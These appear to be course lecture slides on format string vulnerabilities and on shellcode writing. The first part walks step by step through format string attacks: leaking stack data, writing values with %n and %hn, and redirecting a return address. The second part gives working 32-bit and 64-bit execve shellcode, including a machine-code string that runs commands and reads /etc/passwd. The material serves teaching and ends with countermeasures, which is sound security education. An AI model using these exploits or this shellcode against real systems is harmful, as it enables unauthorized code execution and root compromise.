Outline
- Format String
- Access optional arguments
- How printf() works
- Format string attack
- How to exploit the vulnerability
- Countermeasures
- printf(): Prints a string according to a format.
- int printf(const char *format, ...);
- Argument list of printf() consists of:
  - One concrete argument: format
  - Zero or more optional arguments
- The call still compiles if fewer optional arguments are passed to printf() than the format string expects; at most, the compiler issues a warning.
Access Optional Arguments
- myprintf() shows how printf() actually works.
- Consider myprintf() invoked in line 7.
- The va_list pointer (line 1) accesses the optional arguments.
- The va_start() macro (line 2) calculates the initial position of va_list based on its second argument, Narg (the last argument before the optional arguments begin).
- va_start() gets the start address of Narg, finds its size based on the data type, and sets the value of the va_list pointer.
- The va_list pointer advances using the va_arg() macro.
- va_arg(ap, int): Moves the ap pointer (va_list) up by 4 bytes.
- When all the optional arguments have been accessed, va_end() is called.
How printf() Accesses Optional Arguments
- The printf() call in the example has three optional arguments.
- Elements starting with "%" are called format specifiers.
- printf() scans the format string and prints out each character until "%" is encountered.
- printf() then calls va_arg(), which returns the optional argument pointed to by va_list and advances va_list to the next argument.
- When printf() is invoked, the arguments are pushed onto the stack in reverse order.
- When it scans and prints the format string, printf() replaces %d with the value from the first optional argument and prints out the value.
- va_list is then moved to position 2.
- The va_arg() macro cannot tell whether it has reached the end of the optional argument list.
- It continues fetching data from the stack and advancing the va_list pointer.
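The scanning behaviour described above can be sketched with a toy model. This is not how the C library is implemented; `toy_printf` and the `stack` list are hypothetical names, and the list simply stands in for the 4-byte words located above the format string argument.

```python
import re

def toy_printf(fmt, stack):
    """Toy model of printf(): `stack` holds the words above the format string.

    The first entries are the real optional arguments; anything after them
    is unrelated stack data that the caller never meant to pass.
    """
    ap = 0          # index into `stack`, playing the role of the va_list pointer
    out = []
    pos = 0
    for m in re.finditer(r"%([dx])", fmt):
        out.append(fmt[pos:m.start()])   # copy plain characters up to the next "%"
        value = stack[ap]                # va_arg(): fetch the current word ...
        ap += 1                          # ... and advance to the next one
        out.append(str(value) if m.group(1) == "d" else format(value, "x"))
        pos = m.end()
    out.append(fmt[pos:])
    return "".join(out)

# Two real arguments (100 and 255), followed by unrelated stack data.
stack = [100, 255, 0x11223344, 0xbffff304]

print(toy_printf("ID: %d, flags: %x", stack))   # ID: 100, flags: ff
print(toy_printf("%d %x %x", stack))            # 100 ff 11223344
```

The second call has one specifier too many, and the model, like va_arg(), has no way to notice: it returns the next word on the stack.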
- If user_input becomes part of a format string, any format specifiers it contains are interpreted by printf().
Vulnerable Code Example
#include <stdio.h>
void fmtstr(void)
{
    char input[100];
    int var = 0x11223344;

    /* print out information for experiment purpose
       (the cast assumes a 32-bit build, e.g. gcc -m32) */
    printf("Target address: %x\n", (unsigned) &var);
    printf("Data at target address: 0x%x\n", var);
    printf("Please enter a string: ");
    fgets(input, sizeof(input) - 1, stdin);
    printf(input); // The vulnerable place: user input is used as the format string
    printf("Data at target address: 0x%x\n", var);
}

int main(void) { fmtstr(); return 0; }
- Inside printf(), the starting point of the optional arguments (va_list pointer) is the position right above the format string argument.
What Can We Achieve?
- Attack 1: Crash program
- Attack 2: Print out data on the stack
- Attack 3: Change the program’s data in the memory
- Attack 4: Change the program’s data to a specific value
- Attack 5: Inject Malicious Code
Attack 1: Crash Program
- Use input: %s%s%s%s%s%s%s%s
- printf() parses the format string.
- For each %s, it fetches a value from where va_list points and advances va_list to the next position.
- Since %s interprets the fetched value as an address and reads data from that address, a value that is not a valid address will cause the program to crash.
Attack 2: Print Out Data on the Stack
- Goal: print out a secret variable on the stack.
- Use user input: %x%x%x%x%x%x%x%x
- For each %x, printf() prints out the integer value pointed to by the va_list pointer and advances it by 4 bytes.
- The number of %x specifiers needed is determined by the distance between the starting point of the va_list pointer and the variable; it can be found through trial and error.
Attack 3: Change Program’s Data in the Memory
- Goal: change the value of the var variable from 0x11223344 to some other value.
- %n: Writes the number of characters printed out so far into memory.
- printf("hello%n", &i) ⇒ When printf() gets to %n, it has already printed 5 characters, so it stores 5 at the provided memory address.
- %n treats the value pointed to by the va_list pointer as a memory address and writes into that location.
- If we want to write a value to a memory location, we need to have its address on the stack.
- The address of var is provided at the beginning of the input so that it is stored on the stack.
- $(command): Command substitution. Allows the output of the command to replace the command itself.
- \x04: Indicates a single byte with the value 0x04, not the two ASCII characters "0" and "4".
- Assuming the address of var is 0xbffff304 (can be obtained using gdb), var's address (0xbffff304) is on the stack.
- Goal: move the va_list pointer to this location and then use %n to store some value.
- %x is used to advance the va_list pointer.
- Using trial and error, check how many %x are needed to print out 0xbffff304.
- If 6 %x format specifiers are needed, use 5 %x and 1 %n.
- After the attack, the data at the target address is modified to 0x2c (44 in decimal), because 44 characters have been printed out before %n.
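As a minimal sketch of how such an input could be assembled, the following builds the byte string from the target address and the number of specifiers found by trial and error. The helper name `build_overwrite_input` is hypothetical, and the layout (address first, then bare `%x` specifiers) is an assumption; the exact character count that ends up in var (44 in the slide) depends on the stack contents and on any separator characters, so it is not reproduced here.

```python
import struct

def build_overwrite_input(target_addr, specifiers_needed):
    """Target address (little-endian), then (n - 1) x "%x", then one "%n"."""
    addr = struct.pack("<I", target_addr)          # 0xbffff304 -> 04 f3 ff bf
    advance = b"%x" * (specifiers_needed - 1)      # moves va_list up to the address
    return addr + advance + b"%n"                  # %n writes through the address

payload = build_overwrite_input(0xbffff304, 6)
print(payload)   # b'\x04\xf3\xff\xbf%x%x%x%x%x%n'
```

Writing the payload to a file in binary mode and redirecting it to the program's standard input would play the same role as the `$(printf ...)` command substitution.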
Attack 4: Change Program’s Data to a Specific Value
- Goal: change the value of var from 0x11223344 to 0x9896a9
- printf() has already printed out 41 characters before %.10000000x, so 10000000 + 41 = 10000041 (0x9896a9) will be stored in 0xbffff304.
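The arithmetic above can be checked with a short sketch. `precision_for` is a hypothetical helper; it assumes the padded `%x` prints exactly as many characters as its precision field, which holds whenever the precision is at least 8 for a 32-bit value.

```python
def precision_for(target_value, already_printed):
    """Precision N for "%.Nx" so that a following %n stores target_value."""
    n = target_value - already_printed
    if n <= 0:
        raise ValueError("target must exceed the characters already printed")
    return n

n = precision_for(0x9896a9, already_printed=41)
print(n)              # 10000000
print(hex(41 + n))    # 0x9896a9
```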
Attack 4: A Faster Approach
- Goal: change the value of var to 0x66887799
- Use %hn to modify the var variable two bytes at a time.
- Break the memory of var into two parts, each with two bytes.
- Most computers use the Little-Endian architecture
  - The 2 least significant bytes (0x7799) are stored at address 0xbffff304
  - The 2 most significant bytes (0x6688) are stored at 0xbffff306
- If the first %hn gets value x, and before the next %hn, t more characters are printed, the second %hn will get value x+t.
- Because the count can only grow, the smaller value is written first: overwrite the bytes at 0xbffff306 with 0x6688.
- Print some more characters so that when we reach 0xbffff304, the number of characters will be increased to 0x7799.
- The attack format consists of:
  - Address A: first part of the address of var, 0xbffff306 (4 chars)
  - Address B: second part of the address of var, 0xbffff304 (4 chars)
  - 4 %.8x: To move va_list to reach Address A (Trial and error, 4x8=32)
  - @@@@: 4 chars
  - 5 _: 5 chars
  - Total: 12+5+32 = 49 chars
- To have printed 0x6688 (26248) characters, we need 26248 - 49 = 26199 as the precision field of the next %x.
- If the second %hn immediately followed the first, va_list would point to the second address and the same value would be stored.
- Hence, put @@@@ between the two addresses so that we can insert one more %x and increase the number of printed characters to 0x7799.
- After the first %hn, the va_list pointer points to @@@@; the extra %x consumes it and advances the pointer to the second address.
- The precision field of this %x is set to 4368 = 30617 - 26248 - 1 (the 1 accounts for one more character printed between the two %hn) so that 0x7799 (30617) characters have been printed when we reach the second %hn.
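The two precision fields can be recomputed with a small sketch. `hn_precisions` and its parameter names are hypothetical; the function only reproduces the arithmetic of the slide and assumes that exactly `separators` plain characters are printed between the first %hn and the second padded %x.

```python
def hn_precisions(first, second, printed_before, separators=1):
    """Precision fields of the padded %x placed before each of the two %hn.

    first / second : 16-bit values stored by the first and second %hn
    printed_before : characters already printed before the first padded %x
    separators     : plain characters printed between the two %hn
    """
    p1 = first - printed_before
    p2 = second - first - separators
    if p1 <= 0 or p2 <= 0:
        raise ValueError("values must be written in increasing order")
    return p1, p2

p1, p2 = hn_precisions(0x6688, 0x7799, printed_before=49)
print(p1, p2)   # 26199 4368
```

The check on `p2` reflects the constraint that the character count never decreases, which is why 0x6688 is written before 0x7799.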
Attack 5: Inject Malicious Code
- Goal: Modify the return address of the vulnerable code so that it points to the malicious code (e.g., shellcode to execute /bin/sh). Get root access if the vulnerable code is a Set-UID root program.
- Challenges:
  - Inject malicious code into the stack
  - Find the starting address (A) of the injected code
  - Find the location (B) where the return address of the vulnerable code is stored
  - Write value A to B
- Use gdb to get the return address and the start address of the malicious code.
- Assume that the return address is stored at 0xbffff38c
- Assume that the start address of the malicious code is 0xbffff358
- Goal: Write the value 0xbffff358 to address 0xbffff38c
- Break 0xbffff38c into two contiguous 2-byte memory locations: 0xbffff38c and 0xbffff38e
- Store 0xbfff into 0xbffff38e and 0xf358 into 0xbffff38c
- Number of characters printed before the first %hn = 12 + (4x8) + 5 + 49102 = 49151 (0xbfff).
- After the first %hn, 13144 + 1 = 13145 more characters are printed
- 49151 + 13145 = 62296 (0xf358) is written to 0xbffff38c
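The split into two 2-byte writes, and the order in which they must happen, can be sketched as follows. `halfword_writes` is a hypothetical helper; it assumes a little-endian 32-bit target, as in the slides.

```python
def halfword_writes(addr, value):
    """Split a 32-bit write into two 16-bit writes, smaller value first."""
    low = (addr, value & 0xFFFF)                 # low half lives at addr
    high = (addr + 2, (value >> 16) & 0xFFFF)    # high half lives at addr + 2
    return sorted([low, high], key=lambda w: w[1])

writes = halfword_writes(0xbffff38c, 0xbffff358)
for address, half in writes:
    print(hex(address), hex(half), half)

# Character counts from the slide: 49 characters precede the first padded %x,
# and one extra character is printed between the two %hn.
first_precision = writes[0][1] - 49
second_precision = writes[1][1] - writes[0][1] - 1
print(first_precision, second_precision)   # 49102 13144
```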
Countermeasures: Developer
- Avoid using untrusted user inputs for format strings in functions like printf, sprintf, fprintf, vprintf, scanf, vfscanf.
Countermeasures: Compiler
- Compilers can detect potential format string vulnerabilities.
- Use two compilers to compile the program: gcc and clang.
- There should be a mismatch in the format string.
- With default settings, both compilers give warnings for the first printf().
- No warning is given for the second one.
- With the option -Wformat=2, both compilers give warnings for both printf() statements, stating that the format string is not a string literal.
- These warnings only remind developers of a potential problem; the programs are still compiled.
Other Countermeasures
- Address randomization: Makes it difficult for the attackers to guess the address of the target memory (return address, address of the malicious code)
- Non-executable Stack/Heap: Stops injected code from running on the stack or heap, but attackers can use the return-to-libc technique to defeat the countermeasure.
Summary
- How format string works
- Format string vulnerability
- Exploiting the vulnerability
- Injecting malicious code by exploiting the vulnerability
Shellcode
Outline
- Challenges in writing shellcode
- Two approaches
- 32-bit and 64-bit Shellcode
Introduction
- In code injection attack: need to inject binary code
- Shellcode is a common choice
- Its goal: get a shell. After that, arbitrary commands can be run
- Written using assembly code
Writing a Simple Assembly Program
- Invoke exit()
- Compilation (32-bit)
$ nasm -f elf32 -o myexit.o myexit.s
- Linking to generate final binary
$ ld -m elf_i386 myexit.o -o myexit
section .text
global _start
_start:
mov eax, 1 ; system call number of exit()
mov ebx, 0 ; exit status 0
int 0x80 ; invoke the system call
- Consider the following program
int main(int argc, char **argv) {
    char buf[64];
    gets(buf); /* no bounds check: input longer than buf overflows it */
}
THE BASIC IDEA
Writing Shellcode Using C
#include <unistd.h>
int main(void)
{
    char *argv[2];
    argv[0] = "/bin/sh";
    argv[1] = NULL;
    execve(argv[0], argv, NULL);
    return 1; /* reached only if execve() fails */
}
Getting the Binary Code
$ gcc -m32 shellcode.c
$ objdump -Mintel --disassemble a.out
Writing Shellcode Using Assembly
- Invoking execve("/bin/sh", argv, 0)
  - eax = 0x0b: execve() system call number
  - ebx = address of the command string "/bin/sh"
  - ecx = address of the argument array argv
  - edx = address of environment variables (set to 0)
Setting ebx
xor eax, eax
push eax
push "//sh"
push "/bin"
mov ebx, esp
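To see why the string is pushed in this order, the sketch below models the three pushes on a byte string. It is only an illustration: `push` is a hypothetical helper, and the model relies on two facts about 32-bit x86, namely that the stack grows toward lower addresses and that each 4-character constant is stored little-endian.

```python
import struct

def push(memory, word):
    """Model of x86 push: the new 4 bytes land just below the current top."""
    return struct.pack("<I", word) + memory

sh = struct.unpack("<I", b"//sh")[0]     # 32-bit value assembled for "//sh"
bin_ = struct.unpack("<I", b"/bin")[0]   # 32-bit value assembled for "/bin"
print(hex(sh), hex(bin_))                # 0x68732f2f 0x6e69622f

memory = b""
for word in (0, sh, bin_):               # push eax; push "//sh"; push "/bin"
    memory = push(memory, word)

print(memory)   # b'/bin//sh\x00\x00\x00\x00' (bytes starting at esp)
```

Reading upward from esp, the bytes spell the zero-terminated string, so copying esp into ebx yields the address of the command string.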
Setting ecx
argv[0] = address of "/bin//sh"
argv[1] = 0
push eax
push ebx
mov ecx, esp
Setting edx
xor edx, edx
Invoking execve()
xor eax, eax
mov al, 0x0b
int 0x80
Putting Everything Together
xor eax, eax
push eax ; Use 0 to terminate the string
push "//sh"
push "/bin"
mov ebx, esp ; Get the string address
push eax ; argv[1] = 0
push ebx ; argv[0] points to "/bin//sh"
mov ecx, esp ; Get the address of argv[]
xor edx, edx ; No environment variables are passed
xor eax, eax
mov al, 0x0b
int 0x80 ; Invoke execve ()
Compilation and Testing
$ nasm -f elf32 -o shellcode_one.o shellcode_one.s
$ ld -m elf_i386 -o shellcode_one shellcode_one.o
$ echo $$
9650 <-- the current shell's process ID
$ ./shellcode_one
$ echo $$
12380 <-- the current shell's process ID (a new shell)
GETTING RID OF ZEROS FROM SHELLCODE
How to Avoid Zeros
- Using xor
  - "mov eax, 0": not good, it has a zero in the machine code
  - "xor eax, eax": no zero in the machine code
- Using instruction with one-byte operand
  - How to save 0x00000099 to eax?
  - "mov eax, 0x99": not good, 0x99 is actually 0x00000099
  - "xor eax, eax; mov al, 0x99": al is the least significant byte of eax
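The difference shows up directly in the machine code. The sketch below lists the standard 32-bit x86 encodings of these instructions and checks each for zero bytes; the table `ENCODINGS` and the helper `has_zero` are hypothetical names, and an assembler may choose an equivalent alternative encoding for some instructions.

```python
# Standard 32-bit encodings: B8 id = mov eax, imm32; 31 C0 = xor eax, eax;
# B0 ib = mov al, imm8.
ENCODINGS = {
    "mov eax, 0":    bytes.fromhex("b800000000"),
    "xor eax, eax":  bytes.fromhex("31c0"),
    "mov eax, 0x99": bytes.fromhex("b899000000"),
    "mov al, 0x99":  bytes.fromhex("b099"),
}

def has_zero(code):
    """True if the machine code contains a 0x00 byte."""
    return 0 in code

for text, code in ENCODINGS.items():
    print(f"{text:15} {code.hex():12} zero byte: {has_zero(code)}")
```

Running the same check over a complete shellcode string is a quick way to confirm that no zero byte slipped in.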
Using Shift Operator
- How to assign 0x00112233 to ebx?
mov ebx, 0xFF112233 ; use a non-zero byte (0xFF) in place of the leading 0x00
shl ebx, 8 ; ebx = 0x11223300
shr ebx, 8 ; ebx = 0x00112233
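The effect of the two shifts can be traced with a short sketch that models a 32-bit register with a mask. `shl32` and `shr32` are hypothetical helpers standing in for the shl and shr instructions.

```python
MASK32 = 0xFFFFFFFF

def shl32(value, bits):
    """Logical left shift in a 32-bit register: high bits fall off."""
    return (value << bits) & MASK32

def shr32(value, bits):
    """Logical right shift in a 32-bit register: zeros enter from the left."""
    return (value & MASK32) >> bits

ebx = 0xFF112233
ebx = shl32(ebx, 8)
print(f"{ebx:#010x}")   # 0x11223300
ebx = shr32(ebx, 8)
print(f"{ebx:#010x}")   # 0x00112233
```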
Pushing the "/bin/bash" String Into Stack
- Without using the // technique
mov edx, "h***" ; four characters, so the machine code contains no zero byte
shl edx, 24 ; shift left for 24 bits
shr edx, 24 ; shift right for 24 bits
push edx ; edx now contains h\0\0\0
push "/bas"
push "/bin"
mov ebx, esp ; Get the string address
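The sketch below traces what ends up in memory after these instructions. It is a model only: the three filler characters after "h" are arbitrary because the shifts discard them (`***` here is an assumption), and the variable names are hypothetical.

```python
import struct

MASK32 = 0xFFFFFFFF

edx = struct.unpack("<I", b"h***")[0]   # 'h' is the lowest byte (little-endian)
edx = (edx << 24) & MASK32              # shl edx, 24 -> 0x68000000
edx = edx >> 24                         # shr edx, 24 -> 0x00000068

memory = b""
for word in (edx,
             struct.unpack("<I", b"/bas")[0],
             struct.unpack("<I", b"/bin")[0]):
    # Each push lands below the previous one because the stack grows downward.
    memory = struct.pack("<I", word) + memory

print(hex(edx))   # 0x68
print(memory)     # b'/bin/bash\x00\x00\x00'
```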
ANOTHER APPROACH
Getting the Addresses of String and ARGV[]
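- The "call" instruction pushes the address of the data that follows it onto the stack
- Pop out the address stored by "call" to get the address of the string
two:
call one
db '/bin/sh*' ; the '*' will be replaced by a zero
db 'AAAA' ; placeholder for argv[0]
db 'BBBB' ; placeholder for argv[1]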
Data Preparation
; Putting a zero at the end of the shell string
xor eax, eax ; eax contains a zero
mov [ebx+7], al ; replace the '*' with a zero
; Constructing the argument array
mov [ebx+8], ebx ; argv[0] = address of "/bin/sh"
mov [ebx+12], eax ; argv[1] = 0
lea ecx, [ebx+8] ; let ecx = ebx + 8, the address of argv[]
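The effect of these instructions on the data region can be simulated on a byte array. `prepare` is a hypothetical helper, and `BASE` is a made-up address standing in for whatever value `pop ebx` would return at run time.

```python
import struct

BASE = 0x0804a000   # hypothetical run-time address of the data region (ebx)

def prepare(data, ebx):
    """Apply the data-preparation steps to a copy of the data region."""
    buf = bytearray(data)
    buf[7] = 0                             # mov [ebx+7], al   : end the string
    buf[8:12] = struct.pack("<I", ebx)     # mov [ebx+8], ebx  : argv[0]
    buf[12:16] = struct.pack("<I", 0)      # mov [ebx+12], eax : argv[1] = 0
    ecx = ebx + 8                          # lea ecx, [ebx+8]  : address of argv[]
    return bytes(buf), ecx

region, ecx = prepare(b"/bin/sh*AAAABBBB", BASE)
print(region)
print(hex(ecx))   # 0x804a008
```

Since these writes land inside the code region, they only succeed when that region is writable.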
Compilation and Testing
- Error (code region cannot be modified)
$ nasm -f elf32 -o shellcode_two.o shellcode_two.s
$ ld -m elf_i386 -o shellcode_two shellcode_two.o
$ ./shellcode_two
Segmentation fault
- Make code region writable
$ nasm -f elf32 -o shellcode_two.o shellcode_two.s
$ ld --omagic -m elf_i386 -o shellcode_two shellcode_two.o
$ ./shellcode_two
$
64-BIT SHELLCODE
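_start:
xor rdx, rdx ; 3rd argument (rdx): no environment variables
push rdx ; Use 0 to terminate the string
mov rax, "/bin//sh"
push rax ; Push the command string
mov rdi, rsp ; 1st argument (rdi): address of "/bin//sh"
push rdx ; argv[1] = 0
push rdi ; argv[0] points to "/bin//sh"
mov rsi, rsp ; 2nd argument (rsi): address of argv[]
xor rax, rax
mov al, 0x3b ; execve()
syscall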
A Generic Shellcode (64-bit)
- Goal: execute arbitrary commands
/bin/bash -c "<commands>"
Data region
two:
call one
db '/bin/bash*'
db '-c*'
; List of commands, padded with spaces so that the final '*' is at offset ARGV-1
db '/bin/ls -1; echo Hello 64; /bin/tail -n 4 /etc/passwd     *'
db 'AAAAAAAA' ; Placeholder for argv[0] --> "/bin/bash"
db 'BBBBBBBB' ; Placeholder for argv[1] --> "-c"
db 'CCCCCCCC' ; Placeholder for argv[2] --> the cmd string
db 'DDDDDDDD' ; Placeholder for argv[3] --> NULL
ARGV equ 72 ; offset of argv[] from the start of the data (0x48 in the machine code)
Data Preparation (1)
one:
pop rbx ; Get the address of the data
; Add a zero to the end of each string
xor rax, rax
mov [rbx+9], al ; terminate the "/bin/bash" string
mov [rbx+12], al ; terminate the "-c" string
mov [rbx+ARGV-1], al ; terminate the cmd string
Data Preparation (2)
; Construct the argument arrays
mov [rbx+ARGV], rbx ; argv[0] --> "/bin/bash"
lea rcx, [rbx+10]
mov [rbx+ARGV+8], rcx ; argv[1] --> "-c"
lea rcx, [rbx+13]
mov [rbx+ARGV+16], rcx ; argv[2] --> the cmd string
mov [rbx+ARGV+24], rax ; argv[3] = 0
; rdi --> "/bin/bash"
mov rdi, rbx
; rsi --> argv[]
lea rsi, [rbx+ARGV]
; rdx = 0
xor rdx, rdx
; execve ()
xor rax, rax
mov al, 0x3b
syscall
Machine Code
shellcode = (
"\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"
"\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"
"\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"
"\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"
"/bin/bash*"
"-c*"
"/bin/ls -1; echo Hello 64; /bin/tail -n 4 /etc/passwd     *"
# The * at the end of the line above serves as the position marker
"AAAAAAAA" # Placeholder for argv[0] --> "/bin/bash"
"BBBBBBBB" # Placeholder for argv[1] --> "-c"
"CCCCCCCC" # Placeholder for argv[2] --> the cmd string
"DDDDDDDD" # Placeholder for argv[3] --> NULL
).encode('latin-1')
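The machine code addresses the data through fixed offsets (0x09, 0x0c, 0x47, and 0x48 for argv[]), so the command string has to be padded to an exact length. The sketch below shows one way to build the data region so that those offsets line up; `build_data` is a hypothetical helper, and padding with spaces before the final `*` is an assumption that works because the shell ignores trailing spaces.

```python
ARGV = 0x48   # offset of argv[] used by the machine code (mov [rbx+0x48], rbx)

def build_data(cmd):
    """Lay out the strings so that argv[] starts exactly at offset ARGV."""
    head = b"/bin/bash*" + b"-c*"
    room = ARGV - len(head) - 1            # bytes available for the command
    if len(cmd) > room:
        raise ValueError(f"command too long: {len(cmd)} > {room} bytes")
    body = cmd.ljust(room) + b"*"          # pad with spaces, marker at ARGV-1
    placeholders = b"AAAAAAAA" + b"BBBBBBBB" + b"CCCCCCCC" + b"DDDDDDDD"
    return head + body + placeholders

data = build_data(b"/bin/ls -1; echo Hello 64; /bin/tail -n 4 /etc/passwd")
for offset in (0x09, 0x0c, ARGV - 1):
    print(hex(offset), data[offset:offset + 1])   # each prints b'*'
```

A different command can be substituted as long as it fits in the available room; a longer one would require changing the offsets in the machine code.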
Summary of Shellcode
- Challenges in writing shellcode
- Two approaches
- 32-bit and 64-bit Shellcode
- A generic shellcode